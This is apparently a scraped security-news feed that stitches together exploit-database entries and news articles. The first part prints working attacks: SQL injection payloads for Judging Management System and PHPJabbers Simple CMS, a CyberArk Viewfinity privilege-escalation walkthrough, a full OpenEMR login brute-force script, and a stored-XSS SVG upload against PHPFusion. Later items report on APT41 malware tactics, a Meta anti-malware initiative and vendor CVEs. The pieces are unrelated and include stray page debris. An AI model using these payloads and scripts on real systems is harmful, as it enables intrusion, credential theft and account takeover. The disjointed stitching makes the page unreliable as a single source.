Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: whoamikey

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=

Vulnerability location: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=, judge\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=-1%27%20union%20select%201,2,database(),4,5,6--+ // Leak place ---> judge\_id

GET /php\-jms/edit\_judge.php?sub\_event\_id\=&se\_name\=&judge\_id\=\-1%27%20union%20select%201,2,database(),4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: closes

CVE-2023-30204: bug_report/SQLi-3.md at main · debug601/bug_report

In CyberArk Viewfinity 5.5.10.95 and 6.x before 6.1.1.220, a low privilege user can escalate to an administrative user via a bug within the "add printer" option.

    # Exploit Title: Privilege Escalation via CyberArk Viewfinity <= 5.5 (5.5.10.95)
    # Date: Found June 2017
    # Vendor Homepage: https://www.cyberark.com/ 
    # Version: Viewfinity version 5.5 (5.5.10.95)
    # Exploit Author: Eric Guillen aka geoda
    # Contact: https://twitter.com/ericsguillen
    # Website: https://geodasecurity.blogspot.com/
    # Tested on: Windows 7 and Windows 10
    # CVE: CVE-2017-11197
    # Category: Privilege Escalation
    
    1. Description
    
    Viewfinity allows the business to "effectively minimize local administrator privileges and control applications on endpoints and servers"
    
    This vulnerability allows a low privilege user to escalate to an administrative user via a bug within the Viewfinity "add printer" option.
    
    2. Proof of Concept
    
    First, verify you are a low privilege user by running the command "net session" in a CMD prompt. Net session displays information about all sessions with the local computer. The user will get Access is denied if they do not have Administrative privileges. 
    
    1. On the system tray, right click on Viewfinity and "Open Viewfinity Control Panel..."
    2. Click "Add Printer"
    3. Click "Add a network, wireless or Bluetooth printer"
    4. Click "The printer that I want isn't listed"
    5. Click "Select a shared printer by name"
    6. Click the "Browse..." icon
    7. Directly in the browser window, search for "C:\windows\system32\cmd.exe" and press <Enter>
    8. This will spawn a new CMD prompt. Verify you are now Administrator by typing in "net session"
    
    3. Solution
    
    Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220. Although untested, this vulnerability could be present prior to v6.1.1.220

CVE-2017-11197: Offensive Security’s Exploit Database Archive

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

PHPJabbers Simple CMS 5.0 SQL Injection

PHPFusion version 9.10.30 suffers from a persistent cross site scripting vulnerability.

Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)  
Application: PHPFusion  
Version: 9.10.30  
Bugs:  XSS  
Technology: PHP  
Vendor URL: https://www.php-fusion.co.uk/home.php  
Software Link: https://sourceforge.net/projects/php-fusion/  
Date of found: 28-04-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)  
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>

poc request:

POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1  
Host: localhost  
Content-Length: 1198  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0  
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="reqid"

187c77be8e52cf  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="cmd"

upload  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="target"

l1_Lw  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.location);  
   </script>  
</svg>  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="mtime[]"

1681116842  
------WebKitFormBoundaryxF2jB690PpLWInAA  
Content-Disposition: form-data; name="overwrite"

0  
------WebKitFormBoundaryxF2jB690PpLWInAA--

3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(  
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)

poc video : https://youtu.be/6yBLnRH8pOY

PHPFusion 9.10.30 Cross Site Scripting


In the pre connection stage, an improper enforcement of message integrity vulnerability exists in BIG-IP Edge Client for Windows and Mac OS.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-22372: myF5


An improper certificate validation vulnerability exists in the BIG-IP Edge Client for Windows and macOS and may allow an attacker to impersonate a BIG-IP APM system.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2023-24461: myF5

A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity.
Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO

Cyber Espionage / Malware

A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity.

Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name **Earth Longzhi**, which is a subgroup within APT41 (aka HOODOO or Winnti) and shares overlaps with various other clusters known as Earth Baku, SparklingGoblin, and GroupCC.

Earth Longzhi was first documented by the cybersecurity firm in November 2022, detailing its attacks against various organizations located in East and Southeast Asia as well as Ukraine.

Attack chains mounted by the threat actor leverage vulnerable public-facing applications as entry points to deploy the BEHINDER web shell, and then leverage that access to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader.

"This recent campaign \[...\] abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard.sys, to disable security products installed on the hosts via a bring your own vulnerable driver (BYOVD) attack," Trend Micro said.

It's by no means the first time Earth Longzhi has leveraged the BYOVD technique, what with previous campaigns utilizing the vulnerable RTCore64.sys driver to restrict the execution of security products.

The malware, dubbed SPHijacker, also employs a second method referred to as "stack rumbling" to achieve the same objective, which entails deliberately causing the targeted applications to crash upon launch.

"This technique is a type of \[denial-of-service\] attack that abuses undocumented MinimumStackCommitInBytes values in the \[Image File Execution Options\] registry key," Trend Micro explained.

"The value of MinimumStackCommitInBytes associated with a specific process in the IFEO registry key will be used to define the minimum size of stack to commit in initializing the main thread. If the stack size is too large, it will trigger a stack overflow exception and terminate the current process."

The twin approaches are far from the only methods that can be used to impair security products. Deep Instinct, last month, detailed a new code injection technique christened Dirty Vanity that exploits the remote forking mechanism in Windows to blindside endpoint detection systems.

What's more, the driver payload is installed as a kernel-level service using Microsoft Remote Procedure Call (RPC) as opposed to Windows APIs to evade detection.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Also observed in the attacks is the use of a DLL-based dropper named Roxwrapper to deliver another Cobalt Strike loader labeled BigpipeLoader as well as a privilege escalation tool (dwm.exe) that abuses the Windows Task Scheduler to launch a given payload with SYSTEM privileges.

The specified payload, dllhost.exe, is a downloader that's capable of retrieving next-stage malware from an actor-controlled server.

It's worth pointing out here that dwm.exe is based on an open source proof-of-concept (PoC) available on GitHub, suggesting that the threat actor is drawing inspiration from existing programs to hone its malware arsenal.

Trend Micro further said it identified decoy documents written in Vietnamese and Indonesian, indicating potential attempts to target users in the two countries in the future.

"Earth Longzhi remains active and continues to improve its tactics, techniques, and procedures (TTPs)," security researchers Ted Lee and Hara Hiroaki noted. "Organizations should stay vigilant against the continuous development of new stealthy schemes by cybercriminals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics

The company is adding new tools as bad actors use ChatGPT-themed lures and mask their infrastructure in an attempt to trick victims and elude defenders.

The social media giant Meta warned today that it sees many malware actors spreading their attack infrastructure across multiple platforms, to make it more difficult for individual tech companies to detect their malicious activity. The company added, though, that it views the shift in tactics as a sign that industry crackdowns are working, and it says it is launching additional resources and protections for business users with the goal of raising the barriers for attackers even more.

On Facebook, Meta has now added new controls for business accounts to manage, audit, and limit who can become an account administrator, who can add other administrators, and who can perform sensitive actions like accessing a line of credit. The goal is to make it more difficult for attackers to use some of their most common tactics. For example, bad actors may take over the account of an individual who is employed by or otherwise connected to a target company, so the attacker can then add the compromised account as an administrator on the business page.

Meta is also launching a step-by-step tool for businesses to help them flag and remove malware on their enterprise devices and will even suggest using third-party malware scanners. The company says it sees a pattern in which users' Facebook accounts are compromised, the owners regain control, and then the accounts are re-compromised because the targets' devices are still infected with malware or have been reinfected.

“This is an ecosystem challenge, and there’s a lot of adversary adaptation,” says Nathaniel Gleicher, Meta’s head of security policy. “What we’re seeing is adversaries working really hard, but defenders moving more systematically. We're not just disrupting individual bad actors; there are a number of different ways that we are countering them and making it harder.”

The move to distribute malicious infrastructure across multiple platforms has advantages for attackers. They may distribute ads on a social network like Facebook that aren't directly malicious, but that link to a fake creator page or other niche profile. On that site, attackers can post a special password and link to a file-sharing service like Dropbox or Mega. Then they can upload their malicious file to the hosting platform and encrypt it with the password from the previous page to make it harder for companies to scan and flag. In this way, victims follow the bread crumbs through a chain of legitimate-looking services, and no one site has a complete view of every step in the attack.

As public interest in generative AI chatbots like ChatGPT and Bard has ramped up in recent months, Meta also says it has seen attackers incorporating the topic into their malicious ads, claiming to offer access to these and other generative AI tools. Since March 2023, the company says, it has blocked more than 1,000 malicious links used in generative AI-themed lures so they can't be shared on Facebook or other Meta platforms, and it has shared the URLs with other tech companies. It has also reported multiple browser extensions and mobile apps related to these malicious campaigns.

Meta says the attackers who distribute a known malware strain called Ducktail have increasingly leaned on these techniques in an attempt to compromise a range of victims and take over Facebook business accounts to distribute more of their malicious ads. Meta attributes Ducktail's activity to actors in Vietnam, and the company recently issued a cease-and-desist letter to specific individuals in addition to reporting the activity to law enforcement.

In late January, Meta also identified a new malware strain, dubbed NodeStealer, that was targeting Windows browsers to record victims' usernames and passwords, steal cookies, and use the data to compromise Facebook accounts as well as Gmail and Outlook accounts. Meta also attributes this campaign to Vietnamese actors, and it quickly began submitting takedown requests to hosting providers, domain registrars, and other application services that the actor was using for its activity and malware distribution. The company says these steps appear to have been disruptive, and it hasn't detected new samples of NodeStealer since February 27.

“What they’re counting on is that we are going to keep working in silos amongst companies and we’re not going to be able to follow them jump to jump, platform to platform,” Meta's Gleicher says. 

He adds that in addition to adding new features for users, expanding Meta's automatic detections, and taking direct action against attackers, the company uses public disclosure and information-sharing with other companies and law enforcement as a way of making things more difficult for attackers.

“It’s easy to recognize that the more platforms need to coordinate, the more complex the defenses can be,” Gleicher says. “But the more distributed an adversary's operation is, the more they have to keep all these different platforms working together, and the number of victims who make it through that funnel is lower and lower. The more we force them to be distributed, the higher the cost on the adversary.”

Meta Moves to Counter New Malware and Repeat Account Takeovers

Code execution and sensitive information disclosure due to excessive privileges assigned to Acronis Agent. The following products are affected: Acronis Cyber Protect 15 (Windows, Linux) before build 29486, Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545.

Tag

#windows